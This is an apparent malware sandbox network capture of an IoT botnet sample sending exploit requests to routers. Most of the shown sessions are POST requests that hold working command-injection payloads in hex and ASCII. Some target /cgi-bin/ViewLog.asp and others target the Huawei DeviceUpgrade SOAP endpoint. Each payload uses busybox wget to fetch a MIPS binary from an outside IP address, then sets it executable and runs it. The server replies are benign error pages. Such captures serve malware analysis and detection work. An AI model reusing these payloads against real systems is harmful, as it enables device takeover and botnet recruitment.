                                              Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              136192.168.2.133982694.120.0.1778080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.799431086 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              137192.168.2.135312494.43.76.1868080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.849071026 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              138192.168.2.134279085.122.227.1748080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.876375914 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              139192.168.2.133884085.154.98.1748080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:38.111511946 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              140192.168.2.135715062.78.36.1308080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:38.793766022 CET326INHTTP/1.0 400 Bad Request
                                              Server: httpd/2.0
                                              Date: Thu, 23 Nov 2023 04:19:12 GMT
                                              Content-Type: text/html
                                              Connection: close
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              141192.168.2.134562495.216.226.2248080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:39.797969103 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:39.993803024 CET533INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:15:39 GMT
                                              Server: Apache/2.4.29 (Ubuntu) mod_fcgid/2.3.9 OpenSSL/1.1.1 mod_perl/2.0.10 Perl/v5.26.1
                                              Content-Length: 226
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              142192.168.2.135262694.137.187.278080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:39.842495918 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:40.085880995 CET839INHTTP/1.1 404 Not Found
                                              Server: mini_httpd/1.30 26Oct2018
                                              Date: Thu, 23 Nov 2023 04:15:39 GMT
                                              Cache-Control: no-cache,no-store
                                              Content-Type: text/html; charset=%s
                                              Content-Security-Policy: frame-ancestors 'none'
                                              Content-Security-Policy: frame-ancestors 'self'
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 0a 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 63 63 39 39 39 39 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 0a 20 20 20 20 3c 68 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 20 20 20 20 3c 68 72 3e 0a 0a 20 20 20 20 3c 61 64 64 72 65 73 73 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 6e 69 5f 68 74 74 70 64 2f 22 3e 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 33 30 20 32 36 4f 63 74 32 30 31 38 3c 2f 61 3e 3c 2f 61 64 64 72 65 73 73 3e 0a 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html> <head> <meta http-equiv="Content-type" content="text/html;charset=UTF-8"> <title>404 Not Found</title> </head> <body bgcolor="#cc9999" text="#000000" link="#2020ff" vlink="#4040cc"> <h4>404 Not Found</h4>File not found. <hr> <address><a href="http://www.acme.com/software/mini_httpd/">mini_httpd/1.30 26Oct2018</a></address> </body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              143192.168.2.134953662.29.61.658080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:40.061575890 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              144192.168.2.133469095.86.113.1008080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:40.071712017 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              145192.168.2.133440662.29.52.1168080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:40.095812082 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              146192.168.2.1345022156.247.28.7637215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:40.205476999 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:41.862597942 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:43.814599037 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:47.750605106 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
